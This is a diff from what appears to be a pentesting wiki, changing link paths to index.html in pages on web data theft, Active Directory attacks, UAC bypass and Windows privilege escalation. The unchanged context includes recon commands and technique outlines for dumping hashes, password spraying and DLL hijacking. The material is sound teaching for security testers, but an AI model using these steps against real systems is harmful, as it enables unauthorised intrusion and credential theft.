- [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
- [**XSS**](pentesting-web/xss-cross-site-scripting/index.html): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information.
- [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection/index.html): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
- [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
{{#include ./banners/hacktricks-training.md}}

4
src/todo/stealing-sensitive-information-disclosure-from-a-web.md
View File

@ -6,8 +6,8 @@ If at some point you find a **web page that presents you sensitive information b
Here I present you the main ways to can try to achieve it:
- [**CORS bypass**](../pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page.
- [**XSS**](../pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information.
- [**Danging Markup**](../pentesting-web/dangling-markup-html-scriptless-injection/): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
- [**XSS**](../pentesting-web/xss-cross-site-scripting/index.html): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information.
- [**Danging Markup**](../pentesting-web/dangling-markup-html-scriptless-injection/index.html): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
- [**Clickjaking**](../pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
{{#include ../banners/hacktricks-training.md}}

8
src/windows-hardening/active-directory-methodology/README.md
View File

@ -76,7 +76,7 @@ If you just have access to an AD environment but you don't have any credentials/
### User enumeration
- **Anonymous SMB/LDAP enum:** Check the [**pentesting SMB**](../../network-services-pentesting/pentesting-smb/) and [**pentesting LDAP**](../../network-services-pentesting/pentesting-ldap.md) pages.
- **Anonymous SMB/LDAP enum:** Check the [**pentesting SMB**](../../network-services-pentesting/pentesting-smb/index.html) and [**pentesting LDAP**](../../network-services-pentesting/pentesting-ldap.md) pages.
- **Kerbrute enum**: When an **invalid username is requested** the server will respond using the **Kerberos error** code _KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN_, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response or the error _KRB5KDC_ERR_PREAUTH_REQUIRED_, indicating that the user is required to perform pre-authentication.
```bash
@ -160,7 +160,7 @@ Having compromised an account is a **big step to start compromising the whole do
Regarding [**ASREPRoast**](asreproast.md) you can now find every possible vulnerable user, and regarding [**Password Spraying**](password-spraying.md) you can get a **list of all the usernames** and try the password of the compromised account, empty passwords and new promising passwords.
- You could use the [**CMD to perform a basic recon**](../basic-cmd-for-pentesters.md#domain-info)
- You can also use [**powershell for recon**](../basic-powershell-for-pentesters/) which will be stealthier
- You can also use [**powershell for recon**](../basic-powershell-for-pentesters/index.html) which will be stealthier
- You ca also [**use powerview**](../basic-powershell-for-pentesters/powerview.md) to extract more detailed information
- Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a try. Find where users can RDP, find path to other groups, etc.
- **Other automated AD enumeration tools are:** [**AD Explorer**](bloodhound.md#ad-explorer)**,** [**ADRecon**](bloodhound.md#adrecon)**,** [**Group3r**](bloodhound.md#group3r)**,** [**PingCastle**](bloodhound.md#pingcastle)**.**
@ -195,7 +195,7 @@ Once you have obtained some credentials you could check if you have access to an
If you have compromised credentials or a session as a regular domain user and you have **access** with this user to **any machine in the domain** you should try to find your way to **escalate privileges locally and looting for credentials**. This is because only with local administrator privileges you will be able to **dump hashes of other users** in memory (LSASS) and locally (SAM).
There is a complete page in this book about [**local privilege escalation in Windows**](../windows-local-privilege-escalation/) and a [**checklist**](../checklist-windows-privilege-escalation.md). Also, don't forget to use [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite).
There is a complete page in this book about [**local privilege escalation in Windows**](../windows-local-privilege-escalation/index.html) and a [**checklist**](../checklist-windows-privilege-escalation.md). Also, don't forget to use [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite).
### Current Session Tickets
@ -241,7 +241,7 @@ printnightmare.md
### Hash extraction
Hopefully you have managed to **compromise some local admin** account using [AsRepRoast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) including relaying, [EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/).\
Hopefully you have managed to **compromise some local admin** account using [AsRepRoast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) including relaying, [EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/index.html).\
Then, its time to dump all the hashes in memory and locally.\
[**Read this page about different ways to obtain the hashes.**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md)

2
src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
View File

@ -188,7 +188,7 @@ If you don't care about being noisy you could always **run something like** [**h
### Your own bypass - Basic UAC bypass methodology
If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking/).
If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking/index.html).
1. Find a binary that will **autoelevate** (check that when it is executed it runs in a high integrity level).
2. With procmon find "**NAME NOT FOUND**" events that can be vulnerable to **DLL Hijacking**.

10
src/windows-hardening/windows-local-privilege-escalation/README.md
View File

@ -413,7 +413,7 @@ powershell -command "Get-Clipboard"
### File and Folder Permissions
First of all, listing the processes **check for passwords inside the command line of the process**.\
Check if you can **overwrite some binary running** or if you have write permissions of the binary folder to exploit possible [**DLL Hijacking attacks**](dll-hijacking/):
Check if you can **overwrite some binary running** or if you have write permissions of the binary folder to exploit possible [**DLL Hijacking attacks**](dll-hijacking/index.html):
```bash
Tasklist /SVC #List processes running and services
@ -439,7 +439,7 @@ for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executabl
)
```
**Checking permissions of the folders of the processes binaries (**[**DLL Hijacking**](dll-hijacking/)**)**
**Checking permissions of the folders of the processes binaries (**[**DLL Hijacking**](dll-hijacking/index.html)**)**
```bash
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
@ -552,7 +552,7 @@ For the detection and exploitation of this vulnerability, the _exploit/windows/l
### Services binaries weak permissions
**Check if you can modify the binary that is executed by a service** or if you have **write permissions on the folder** where the binary is located ([**DLL Hijacking**](dll-hijacking/))**.**\
**Check if you can modify the binary that is executed by a service** or if you have **write permissions on the folder** where the binary is located ([**DLL Hijacking**](dll-hijacking/index.html))**.**\
You can get every binary that is executed by a service using **wmic** (not in system32) and check your permissions using **icacls**:
```bash
@ -647,7 +647,7 @@ Windows allows users to specify actions to be taken if a service fails. This fea
### Installed Applications
Check **permissions of the binaries** (maybe you can overwrite one and escalate privileges) and of the **folders** ([DLL Hijacking](dll-hijacking/)).
Check **permissions of the binaries** (maybe you can overwrite one and escalate privileges) and of the **folders** ([DLL Hijacking](dll-hijacking/index.html)).
```bash
dir /a "C:\Program Files"
@ -1540,7 +1540,7 @@ If you want to read an example of [**how to go from high integrity to System usi
### Dll Hijacking
If you manages to **hijack a dll** being **loaded** by a **process** running as **SYSTEM** you will be able to execute arbitrary code with those permissions. Therefore Dll Hijacking is also useful to this kind of privilege escalation, and, moreover, if far **more easy to achieve from a high integrity process** as it will have **write permissions** on the folders used to load dlls.\
**You can** [**learn more about Dll hijacking here**](dll-hijacking/)**.**
**You can** [**learn more about Dll hijacking here**](dll-hijacking/index.html)**.**
### **From Administrator or Network Service to System**